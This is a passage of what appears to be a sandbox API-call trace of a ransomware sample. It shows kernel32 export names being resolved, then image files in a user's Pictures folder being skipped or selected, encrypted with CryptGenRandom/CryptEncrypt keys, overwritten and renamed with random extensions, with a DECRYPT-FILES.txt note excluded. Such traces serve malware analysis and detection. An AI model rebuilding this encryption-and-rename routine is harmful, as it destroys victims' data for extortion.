lpString1="CreateThread") returned="CreateThread" [0086.231] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.231] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.231] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.231] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.231] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.231] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.231] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.231] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.231] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.231] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.231] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.231] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.231] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.231] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.231] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.232] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.232] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.232] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.232] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.232] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.232] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.232] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.232] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.232] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.232] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.232] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.232] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.232] lstrlenA (lpString="DELETEATOM") returned 10 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.232] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.232] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.232] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.232] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.232] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.232] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.232] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.233] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.233] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.233] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.233] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.233] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.233] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.233] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.233] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.233] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.233] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.234] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.234] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.234] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.234] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.234] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.234] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.234] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.234] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.234] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.234] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.234] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.234] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.234] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.234] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.234] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.234] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.234] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.235] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.235] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.235] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.235] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.235] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.235] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.235] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.235] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.235] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.235] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.235] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.235] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp") returned 58 [0086.235] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp.HOU53Fk") returned 66 [0086.235] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\41ny.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp.HOU53Fk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\41ny.bmp.hou53fk"), dwFlags=0x0) returned 1 [0086.236] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.236] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.237] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.237] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9b9a0, ftCreationTime.dwHighDateTime=0x1d4d1ef, ftLastAccessTime.dwLowDateTime=0x81f7b940, ftLastAccessTime.dwHighDateTime=0x1d4cdd9, ftLastWriteTime.dwLowDateTime=0x81f7b940, ftLastWriteTime.dwHighDateTime=0x1d4cdd9, nFileSizeHigh=0x0, nFileSizeLow=0xe51, dwReserved0=0x0, dwReserved1=0x0, cFileName="5xeQDqiQHYKki.jpg", cAlternateFileName="5XEQDQ~1.JPG")) returned 1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="DECRYPT-FILES.txt") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="autorun.inf") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="boot.ini") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="desktop.ini") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="ntuser.dat") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="iconcache.db") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="bootsect.bak") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="ntuser.dat.log") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="thumbs.db") returned -1 [0086.237] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg", lpString2="Bootfont.bin") returned -1 [0086.237] lstrlenW (lpString="5xeQDqiQHYKki.jpg") returned 17 [0086.237] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.237] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.237] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.237] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.237] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.237] lstrlenW (lpString="5xeQDqiQHYKki.jpg") returned 17 [0086.237] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.237] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="5xeQDqiQHYKki.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg" [0086.237] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\5xeqdqiqhykki.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0086.238] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=3665) returned 1 [0086.238] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0086.238] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.238] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.238] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.238] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.238] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0086.239] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.239] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.239] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.239] CloseHandle (hObject=0x43c) returned 1 [0086.239] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.240] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0086.240] CloseHandle (hObject=0x0) returned 0 [0086.240] CloseHandle (hObject=0x438) returned 1 [0086.240] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.241] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.241] GetTickCount () returned 0x114e032 [0086.241] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.241] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.241] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.241] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.242] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.242] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg") returned 67 [0086.242] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg.2IZpsxv") returned 75 [0086.242] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\5xeqdqiqhykki.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\5xeQDqiQHYKki.jpg.2IZpsxv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\5xeqdqiqhykki.jpg.2izpsxv"), dwFlags=0x0) returned 1 [0086.243] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.243] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.243] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.243] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x967efbe0, ftCreationTime.dwHighDateTime=0x1d4d22e, ftLastAccessTime.dwLowDateTime=0x192a5da0, ftLastAccessTime.dwHighDateTime=0x1d4ca23, ftLastWriteTime.dwLowDateTime=0x192a5da0, ftLastWriteTime.dwHighDateTime=0x1d4ca23, nFileSizeHigh=0x0, nFileSizeLow=0x1080d, dwReserved0=0x0, dwReserved1=0x0, cFileName="asWtJL_ki3SxV4p.bmp", cAlternateFileName="ASWTJL~1.BMP")) returned 1 [0086.243] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="DECRYPT-FILES.txt") returned -1 [0086.243] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="autorun.inf") returned -1 [0086.243] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="boot.ini") returned -1 [0086.243] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="desktop.ini") returned -1 [0086.243] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="ntuser.dat") returned -1 [0086.243] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="iconcache.db") returned -1 [0086.243] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="bootsect.bak") returned -1 [0086.244] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="ntuser.dat.log") returned -1 [0086.244] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="thumbs.db") returned -1 [0086.244] lstrcmpiW (lpString1="asWtJL_ki3SxV4p.bmp", lpString2="Bootfont.bin") returned -1 [0086.244] lstrlenW (lpString="asWtJL_ki3SxV4p.bmp") returned 19 [0086.244] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.244] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.244] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.244] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.244] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.244] lstrlenW (lpString="asWtJL_ki3SxV4p.bmp") returned 19 [0086.244] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.244] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="asWtJL_ki3SxV4p.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp" [0086.244] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\asWtJL_ki3SxV4p.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\aswtjl_ki3sxv4p.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0086.244] 